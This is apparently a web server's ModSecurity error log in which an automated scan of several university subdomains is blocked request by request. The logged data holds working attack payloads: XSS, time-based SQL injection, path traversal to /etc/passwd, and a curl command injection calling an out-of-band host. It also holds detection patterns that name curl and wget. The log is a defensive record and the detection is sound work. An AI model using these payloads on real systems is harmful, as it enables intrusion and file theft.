[Tue Aug 29 11:40:07.388002 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAcaVLIAAAAu"]
[Tue Aug 29 11:40:07.389427 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAXQKKMAAAAj"]
[Tue Aug 29 11:40:07.389457 2023] [:error] [pid 1678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAaO3gAAAAAX"]
[Tue Aug 29 11:40:07.397070 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcPivYAAAAa"]
[Tue Aug 29 11:40:07.418975 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcYUz0AAAAp"]
[Tue Aug 29 11:40:07.422371 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAXbcKYAAAAL"]
[Tue Aug 29 11:40:09.368554 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12qcCo-f0AAAYh9d0AAAAK"]
[Tue Aug 29 11:40:09.378810 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gr63qpyuzhaaak.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12qcCo-f0AAAXYiZ8AAAAG"]
[Tue Aug 29 11:40:11.371783 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12q8Co-f0AAAaXqucAAAAl"]
[Tue Aug 29 11:40:11.404249 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12q8Co-f0AAAcaVLUAAAAu"]
[Tue Aug 29 11:40:12.371787 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAATZp7cAAAAf"]
[Tue Aug 29 11:40:12.408136 2023] [:error] [pid 1815] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAcXk2UAAAAe"]
[Tue Aug 29 11:40:12.467897 2023] [:error] [pid 1815] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAcXk2cAAAAe"]
[Tue Aug 29 11:40:12.490543 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAXYiaQAAAAG"]
[Tue Aug 29 11:40:12.491486 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAATZp7sAAAAf"]
[Tue Aug 29 11:40:16.362518 2023] [:error] [pid 1691] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12sMCo-f0AAAab9T4AAAAV"]
[Tue Aug 29 11:40:17.400694 2023] [:error] [pid 1793] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12scCo-f0AAAcBbY4AAAAH"]
[Tue Aug 29 11:40:21.434381 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAaXqvcAAAAl"]
[Tue Aug 29 11:40:21.436577 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAcYU00AAAAp"]
[Tue Aug 29 11:40:21.439332 2023] [:error] [pid 1678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAaO3hIAAAAX"]
[Tue Aug 29 11:40:21.465276 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAYf-F8AAAAD"]
[Tue Aug 29 11:40:22.407942 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcYU08AAAAp"]
[Tue Aug 29 11:40:22.547699 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcPiwUAAAAa"]
[Tue Aug 29 11:40:22.640571 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcjAhsAAAAw"]
[Tue Aug 29 11:40:22.645636 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAYMWPkAAAAR"]
[Tue Aug 29 11:40:22.649341 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAXbcLkAAAAL"]
[Tue Aug 29 11:40:22.664729 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcYU1EAAAAp"]
[Tue Aug 29 11:40:25.367811 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12ucCo-f0AAAaXqwAAAAAl"]
[Tue Aug 29 11:40:26.471229 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12usCo-f0AAAcjAigAAAAw"]
[Tue Aug 29 11:40:32.405182 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAaXqwsAAAAl"]
[Tue Aug 29 11:40:32.433573 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAaXqwwAAAAl"]
[Tue Aug 29 11:40:32.435439 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAYMWQcAAAAR"]
[Tue Aug 29 11:40:32.436995 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAcYU2sAAAAp"]
